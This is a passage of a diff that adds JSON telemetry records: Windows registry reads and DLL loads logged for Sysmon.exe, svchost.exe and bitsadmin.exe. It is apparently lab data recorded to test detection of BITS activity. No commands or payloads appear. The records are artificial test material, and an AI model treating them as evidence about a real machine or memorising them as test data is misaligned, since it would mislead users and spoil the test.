"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 5868, + "process_name": "bitsadmin.exe", + "process_path": "C:\\Windows\\System32\\bitsadmin.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": 
"C:\\Windows\\System32\\BitsProxy.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570902460000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883570903390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dhcpcsvc6.dll", + "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570903240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570903560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570903560016, + "unique_pid": 